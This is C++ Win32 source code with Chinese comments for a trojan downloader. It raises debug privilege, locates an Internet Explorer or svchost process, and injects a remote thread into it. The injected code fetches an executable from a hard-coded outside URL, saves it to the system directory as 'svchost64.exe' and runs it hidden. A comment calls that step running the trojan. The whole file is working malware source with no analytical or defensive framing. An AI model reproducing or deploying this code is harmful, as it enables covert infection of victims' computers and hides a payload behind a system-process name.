C++ win32 downloader

8.
9. /***********************************************/
10. typedef HINSTANCE (__stdcall *fun_ShellExecute)(HWND hWnd, //定义 ShellExecute
11. LPCTSTR lpOperation,
12. LPCTSTR lpFile,
13. LPCTSTR lpParameters,
14. LPCTSTR lpDiretory,
15. INT nShowCmd);
16.
17. typedef int (__stdcall *fun_MessageBox)(HWND hWnd, LPCTSTR lpszText, //定义MessageBoxA原型
18. LPCTSTR lpszCaption, UINT nType);
19.
20. // define functions in kernel32.dll
21. typedef HANDLE (__stdcall *fun_CreateFile)( LPCTSTR, DWORD, DWORD, //定义CreateFileA
22. LPSECURITY_ATTRIBUTES,
23. DWORD, DWORD, HANDLE );
24. typedef BOOL (__stdcall *fun_WriteFile)( HANDLE, LPCVOID, DWORD, //定义WriteFile
25. LPDWORD, LPOVERLAPPED );
26. typedef BOOL (__stdcall *fun_CloseHandle)( HANDLE hObject ); //定义CloseHandle
27. typedef HMODULE (__stdcall *fun_GetModuleHandle)(LPCTSTR); //定义GetModuleHandle
28. typedef FARPROC (__stdcall *fun_GetProcAddress)(HMODULE, LPCTSTR); //定义GetProcAddress
29. typedef HINSTANCE (__stdcall *fun_LoadLibrary)(LPCTSTR); //定义LoadLibraryA
30.
31. // define functions in wininet.dll
32. typedef HINTERNET (__stdcall *fun_InternetOpen)(IN LPCTSTR lpszAgent, //定义InternetOpen
33. IN DWORD dwAccessType,
34. IN LPCTSTR lpszProxyByName,
35. IN LPCTSTR lpszProxyByPass,
36. IN DWORD dwFlags);
37. typedef HINTERNET (__stdcall *fun_InternetOpenUrl)(IN HINTERNET hInternet,//定义InternetOpenUrl
38. IN LPCTSTR lpszUrl,
39. IN LPCTSTR lpszHeaders OPTIONAL,
40. IN DWORD dwHeadersLength,
41. IN DWORD dwFlags,
42. IN DWORD dwContext);
43. typedef HINTERNET (__stdcall *fun_InternetReadFile)(IN HINTERNET hFile, //定义InternetReadFile
44. IN LPVOID lpBuffer,
45. IN DWORD dwNumberOfBytesToRead,
46. OUT LPDWORD lpdwNumberOfBytesRead);
47. typedef HINTERNET (__stdcall *fun_InternetCloseHandle)(IN HINTERNET hInternet); //定义InternetCloseHandle
48.
49.
50. typedef struct tag_Inject // define a structure to copy to distance process
51. {
52. fun_GetModuleHandle GetModuleHandle;
53. fun_GetProcAddress GetProcAddress;
54. fun_LoadLibrary LoadLibrary;
55. char szKernel[32];
56. char szUser[32];
57. char szNet[32];
58. char szShell[32];
59. char szMessageBox[32];
60. char szInternetOpen[32];
61. char szInternetOpenUrl[MAX_PATH];
62. char szInternetReadFile[128];
63. char szInternetCloseHandle[32];
64. char szCreateFile[32];
65. char szWriteFile[32];
66. char szCloseHandle[32];
67. char szShellExecute[32];
68. char szHeader[16];
69. char szInterFlag[32];
70. char szOpenFlag[10];
71. char szUrlAddr[MAX_PATH];
72. char szUrlAddr1[MAX_PATH];
73. char szFilePath[MAX_PATH];
74. char szFilePath1[MAX_PATH];
75. }Inject;
76.
77. /***************************************/
78.
79. /************************************************/
80. static BOOL ThreadProc(Inject* Inject_info)
81. {
82. HMODULE hKernel32, hUser32, hWininet, hShell32; //模块句柄
83.
84. fun_InternetOpen j_InternetOpen; //定义函数指针
85. fun_InternetOpenUrl j_InternetOpenUrl;
86. fun_InternetReadFile j_InternetReadFile;
87. fun_InternetCloseHandle j_InternetCloseHandle;
88. fun_CreateFile j_CreateFile;
89. fun_WriteFile j_WriteFile;
90. fun_CloseHandle j_CloseHandle;
91. fun_MessageBox j_MessageBox;
92. fun_ShellExecute j_ShellExecute;
93.
94. hKernel32 = Inject_info->GetModuleHandle(Inject_info->szKernel); //隐式加载DLL
95. if (NULL == hKernel32) //加载失败
96. {
97. hKernel32 = Inject_info->LoadLibrary(Inject_info->szKernel); //显示加载
98. if (NULL == hKernel32) //显示加载失败
99. {
100. return FALSE;
101. }
102. }
103.
104. hUser32 = Inject_info->GetModuleHandle(Inject_info->szUser);
105. if (NULL == hUser32)
106. {
107. hUser32 = Inject_info->LoadLibrary(Inject_info->szUser);
108. if (NULL == hUser32)
109. {
110. return FALSE;
111. }
112. }
113.
114. hWininet = Inject_info->GetModuleHandle(Inject_info->szNet);
115. if (NULL == hWininet)
116. {
117. hWininet = Inject_info->LoadLibrary(Inject_info->szNet);
118. if (NULL == hWininet)
119. {
120. return FALSE;
121. }
122. }
123.
124. hShell32 = Inject_info->GetModuleHandle(Inject_info->szShell);
125. if (NULL == hShell32)
126. {
127. hShell32 = Inject_info->LoadLibrary(Inject_info->szShell);
128. if (NULL == hShell32)
129. {
130. return FALSE;
131. }
132. }
133.
134. j_InternetOpen = (fun_InternetOpen)Inject_info->GetProcAddress(hWininet, //绑定 InternetOpen
135. Inject_info->szInternetOpen);
136. j_InternetOpenUrl = (fun_InternetOpenUrl)Inject_info->GetProcAddress(hWininet, //绑定 InternetOpenUrl
137. Inject_info->szInternetOpenUrl);
138. j_InternetReadFile = (fun_InternetReadFile)Inject_info->GetProcAddress(hWininet, //绑定 InternetReadFile
139. Inject_info->szInternetReadFile);
140. j_InternetCloseHandle = (fun_InternetCloseHandle)Inject_info->GetProcAddress(hWininet, //绑定 InternetCloseHandle
141. Inject_info->szInternetCloseHandle);
142.
143. j_CreateFile = (fun_CreateFile)Inject_info->GetProcAddress(hKernel32, //绑定 CreateFile
144. Inject_info->szCreateFile);
145. j_WriteFile = (fun_WriteFile)Inject_info->GetProcAddress(hKernel32, //绑定 WriteFile
146. Inject_info->szWriteFile);
147. j_CloseHandle = (fun_CloseHandle)Inject_info->GetProcAddress(hKernel32, //绑定 CloseHandle
148. Inject_info->szCloseHandle);
149. j_MessageBox = (fun_MessageBox)Inject_info->GetProcAddress(hUser32, //绑定 MessageBox
150. Inject_info->szMessageBox);
151. j_ShellExecute = (fun_ShellExecute)Inject_info->GetProcAddress(hShell32, //绑定 ShellExecute
152. Inject_info->szShellExecute);
153. HINTERNET hNet, hFile; //定义网络句柄和文件句柄
154.
155. hNet = j_InternetOpen(Inject_info->szInterFlag, INTERNET_OPEN_TYPE_PRECONFIG,
156. NULL, NULL, 0); //打开网络并返回网络句柄
157. if (NULL == hNet) //打开网络出错
158. {
159. return FALSE;
160. }
161.
162. hFile = j_InternetOpenUrl(hNet, Inject_info->szUrlAddr, Inject_info->szHeader,
163. strlen(Inject_info->szHeader),
164. INTERNET_FLAG_DONT_CACHE|INTERNET_FLAG_RELOAD, 0); //打开指定的URL并返回请求的URL的资源句柄
165. if (NULL == hFile) //打开网络地址出错
166. {
167. return FALSE;
168. }
169.
170. char buff[1024]; //数据传输缓存
171. DWORD dwRead, //字节数
172. dwWritten = NULL; //实际写入的字节数
173.
174. HANDLE hCreateFile = j_CreateFile(Inject_info->szFilePath, GENERIC_READ|GENERIC_WRITE, //始终创建文件
175. 0, NULL, CREATE_ALWAYS, 0 ,NULL);
176. if (NULL == hCreateFile) //创建文件出错！
177. {
178. return FALSE;
179. }
180. while(j_InternetReadFile(hFile, buff, 1023, &dwRead))
181. {
182. if (0 == dwRead) //如果传输出错，退出
183. break;
184. j_WriteFile(hCreateFile, buff, dwRead, &dwWritten, NULL); //将读取到的数据写入本地文件
185.
186. }
187. j_InternetCloseHandle(hNet); //关闭网络句柄
188. j_InternetCloseHandle(hFile); //关闭网络文件句柄
189. j_CloseHandle(hCreateFile); //关闭本地文件句柄
190.
191. j_ShellExecute(NULL, NULL, Inject_info->szFilePath, NULL, NULL, SW_HIDE); //运行木马
192.
193.
194. return TRUE;
195. }
196.
197. static void AddressFlag(void)
198. {
199. }
200. /****************************************************************************************************************/
201.
202.
203. /***************************************************************************************/
204. /* 提升当前进程的权限到 DEBUG */
205. /***************************************************************************************/
206.
207. /****************************************************************************************************************/
208. BOOL ImprovePrivilege() //将进程提权
209. {
210. HANDLE hToken = NULL ; //令牌句柄
211. BOOL bRet = FALSE; //返回执行结果
212. TOKEN_PRIVILEGES tp = {1, {0, 0, SE_PRIVILEGE_ENABLED}}; //填充权限令牌结构
213.
214. LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid); //查询是否具有调试权限
215. OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken); //打开进程权限令牌
216. AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof tp, 0, 0); //为进程申请 DEBUG 权限
217. bRet = (GetLastError() == ERROR_SUCCESS); //检测是否执行成功
218. return bRet;
219. }
220. /****************************************************************************************************************/
221.
222. /***************************************************************************************/
223. /* 得到IExplore.exe的进程ID */
224. /***************************************************************************************/
225.
226. /****************************************************************************************************************/
227. DWORD Get_ProcID()
228. {
229. char* strProc = new char[256];
230. HANDLE hSnap; //快照句柄
231. PROCESSENTRY32 ppe; //进程结构信息
232.
233. hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); //创建系统进程快照
234.
235. if (!ImprovePrivilege()) //提升本进程权限
236. {
237. return FALSE;
238. }
239. ppe.dwSize = sizeof( PROCESSENTRY32 ); //计算结构大小
240. Process32First( hSnap, &ppe ); //找到第一个进程
241. while ( 1 ) //判断系统中的进程是否有IE的进程
242. {
243. strcpy(strProc, ppe.szExeFile); //转存
244. strProc = strlwr(strProc); //转换为小写
245. if (0 == strcmp(strProc, "iexplore.exe"))//判断是否是 IE
246. {
247. return ppe.th32ProcessID;
248. }
249. else if (0 == strcmp(strProc, "svchost.exe"))//判断是否是 svchost
250. {
251. return ppe.th32ProcessID;
252. }
253. if ( !Process32Next( hSnap, &ppe ))
254. {
255. break;
256. }
257. }
258. CloseHandle( hSnap );
259. return 0;
260. }
261. /*************************************/
262.
263. /*************************************************************************************/
264. /* 将 ThreadProc 函数以插入线程的形式在浏览器进程中运行 */
265. /*************************************/
266.
267. /*************************************/
268. BOOL InsertThread()
269. {
270. char szSystemRoot[MAX_PATH];
271. PDWORD pdwRemote = NULL; //申请远程空间地址
272. const int iCodeSize = ((LPBYTE)AddressFlag - (LPBYTE)ThreadProc);//计算代码长度
273.
274. Inject *InjectRemote = NULL; //将Inject复制到远程进程空间中去
275. DWORD dwThread = NULL,
276. dwOut = NULL,
277. dwProc = Get_ProcID();
278. HANDLE hProc = NULL;
279. const DWORD cbMemSize = iCodeSize + sizeof(Inject) + 3; //需要的内存块大小
280.
281.
282. Inject Inject_stru = {NULL, NULL, NULL,
283. "kernel32.dll",
284. "user32.dll",
285. "wininet.dll",
286. "shell32.dll",
287. "MessageBoxA",
288. "InternetOpenA",
289. "InternetOpenUrlA",
290. "InternetReadFile",
291. "InternetCloseHandle",
292. "CreateFileA",
293. "WriteFile",
294. "CloseHandle",
295. "ShellExecuteA",
296. "Accept: */*\r\n\r\n",
297. "RookIE/1.0",
298. "wba",
299. "http://www.hf-hx.com/music/x.exe",
300. ""}; //初始化结构
301.
302. GetSystemDirectory(szSystemRoot, sizeof(szSystemRoot)); //得到系统目录
303. strcat(szSystemRoot, "\\svchost64.exe"); //构造文件名(含路径)
304. strcpy(Inject_stru.szFilePath, szSystemRoot); //传递给Inject 结构中的szFilePaht
305.
306. HMODULE hKernel32 = GetModuleHandle("kernel32.dll");
307. Inject_stru.GetModuleHandle = (fun_GetModuleHandle)GetProcAddress(hKernel32, "GetModuleHandleA");//绑定GetModuleHandle
308. Inject_stru.GetProcAddress = (fun_GetProcAddress)GetProcAddress(hKernel32, "GetProcAddress"); //绑定GetProcAddress
309. Inject_stru.LoadLibrary = (fun_LoadLibrary)GetProcAddress(hKernel32, "LoadLibraryA");//绑定LoadLibrary
310.
311. hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProc); //以最高权限打开浏览器进程
312. if (NULL == hProc)
313. {
314. return FALSE;
315. }
316.
317. pdwRemote = (PDWORD)VirtualAllocEx(hProc, NULL, cbMemSize, MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE); //在远程空间中申请内存块
318. if (NULL == pdwRemote)
319. {
320. return FALSE;
321. }
322.
323. if (!WriteProcessMemory(hProc, pdwRemote, (LPVOID)ThreadProc, cbMemSize, &dwOut)) //向远程进程写入功能代码
324. {
325. return FALSE;
326. }
327.
328. InjectRemote = (Inject*)(((LPBYTE)pdwRemote) + ((iCodeSize + 4) & ~3));
329. if (!WriteProcessMemory(hProc, InjectRemote, &Inject_stru, sizeof(Inject_stru), &dwOut)) //向远程线程写入结构数据
330. {
331. return FALSE;
332. }
333.
334. if (NULL == CreateRemoteThread(hProc, NULL, 65535, (LPTHREAD_START_ROUTINE)pdwRemote, InjectRemote, 0, NULL)) //创建进程线程
335. {
336. return FALSE;
337. }
338.
339. return TRUE;
340. }
341. /******************************************/
342.
343. int APIENTRY WinMain(HINSTANCE hInstance,
344. HINSTANCE hPrevInstance,
345. LPSTR lpCmdLine,
346. int nCmdShow)
347. {
348. InsertThread();
349. return 0;
350. }